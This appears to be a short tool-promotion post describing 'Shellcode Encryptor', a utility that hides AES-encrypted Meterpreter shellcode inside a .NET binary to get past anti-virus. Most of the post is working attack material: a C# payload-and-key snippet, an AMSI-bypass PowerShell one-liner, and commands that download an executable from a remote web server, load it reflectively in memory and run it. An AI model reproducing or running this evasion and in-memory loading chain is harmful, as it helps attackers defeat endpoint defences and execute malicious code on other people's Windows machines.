Shellcode Encryptor: shell code encryptor/decryptor/executor to bypass anti virus

by do son · December 26, 2021

Shellcode Encryptor

A simple shellcode encryptor/decryptor/executor to bypass anti-virus.

Purpose

To generate a .Net binary containing base64 encoded, AES encrypted shellcode that will execute on a Windows target, bypassing anti-virus.

Download

git clone https://github.com/plackyhacker/Shellcode-Encryptor.git

Use

Use the meterpreter_encryptor.py to create the encrypted base64 shellcode:

Take the key and shellcode and insert them into ProcessInjector.cs

// decrypt the base64 payload

string payload = "sZkMii [etc...]";

string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";

Compile the C# code into an executable (e.g., metInject.exe) and serve it via a web server.

Inject the executable into a remote PowerShell process:

# AMSI bypass

$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)



$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;

$assembly = [System.Reflection.Assembly]::Load($bytes);

$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');

$entryPointMethod.Invoke($null, (, [string[]] ('', '')));

The binary was scanned using antiscan.me on 03/10/2021.